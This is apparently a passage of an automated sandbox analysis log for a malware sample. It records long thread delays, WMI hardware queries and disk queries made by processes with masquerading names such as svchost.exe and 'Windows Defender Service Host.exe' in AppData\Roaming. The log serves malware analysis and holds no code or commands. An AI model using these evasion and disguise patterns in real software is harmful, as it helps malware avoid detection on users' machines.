                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -98327s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -98218s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -98109s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -97999s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -35048813740048126s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -600000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -599869s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -599737s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -599578s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -599156s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -598922s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -598813s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -598682s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -598563s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -598453s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -598344s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -598219s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -598109s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -598000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -597891s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -597775s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -597656s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -597547s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -597438s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -597313s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -597188s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -597052s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -596922s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -596812s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -596703s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -596594s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -596484s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -596375s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -596266s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -596154s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -596047s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -595937s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -595811s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -595687s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -595578s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -595468s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -595359s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -595250s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -595141s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -595016s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -594903s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -594797s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -594688s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -594569s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -594453s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -594343s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -594231s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -594125s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -594015s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -593906s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068Thread sleep time: -593797s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep count: 39 > 30
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -35971150943733603s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -600000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 4832Thread sleep count: 9605 > 30
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -599868s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -599743s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -599625s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -599514s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -599394s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -599261s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -599156s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -598601s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -598475s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -598359s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -598236s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -598109s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -597983s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -597873s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -597761s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -597631s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -597500s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -597371s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -597263s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -597137s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -597027s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -596922s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -596806s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -596687s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -596578s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -596468s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -596359s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -596231s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -596124s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -595768s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -595500s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -595390s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -595281s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -595171s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -595062s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -594953s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -594843s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -594734s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -594625s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -594515s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -594406s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -594297s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -594182s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 2724Thread sleep count: 214 > 30
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -594062s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -593953s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -593838s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -593719s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -593605s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -593472s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -593344s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -593234s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -593125s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -593016s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -592904s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588Thread sleep time: -592793s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe TID: 7276Thread sleep time: -17524406870024063s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe TID: 7224Thread sleep time: -29514790517935264s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe TID: 7224Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2000Thread sleep count: 1576 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5668Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2616Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe TID: 8628Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 7192Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe TID: 7316Thread sleep time: -495550s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe TID: 8776Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep count: 1131 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8548Thread sleep time: -11068046444225724s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8300Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8688Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8384Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8140Thread sleep count: 1218 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8596Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8416Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7972Thread sleep count: 1167 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8604Thread sleep time: -11068046444225724s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8360Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5612Thread sleep count: 1345 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8740Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8472Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7492Thread sleep count: 1078 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8728Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8556Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8692Thread sleep time: -10145709240540247s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8488Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep count: 1178 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8668Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8536Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep count: 1111 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8672Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8580Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8288Thread sleep count: 1131 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8784Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8640Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8292Thread sleep count: 1337 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8724Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8632Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8284Thread sleep count: 1216 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8660Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8296Thread sleep count: 753 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8788Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8612Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe TID: 8716Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe TID: 9156Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 7712Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe TID: 7244Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 7900Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\update.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\BTC.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 599881Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 599750Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 599594Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 599079Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 598922Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 598813Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 598688Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 598563Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 598450Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 598329Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 598204Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 598089Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 597969Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 597844Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 597730Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 597610Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 597485Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 597360Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 597235Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 597098Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 596969Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 596844Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 596734Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 596625Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 596516Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 596407Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 596282Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 596157Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 596032Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 595922Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 595808Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 595657Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 100000Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99874Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99764Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99656Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99546Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99437Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99324Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99203Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99093Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98983Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98875Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98765Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98656Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98546Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98437Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98327Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98218Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98109Jump to behavior
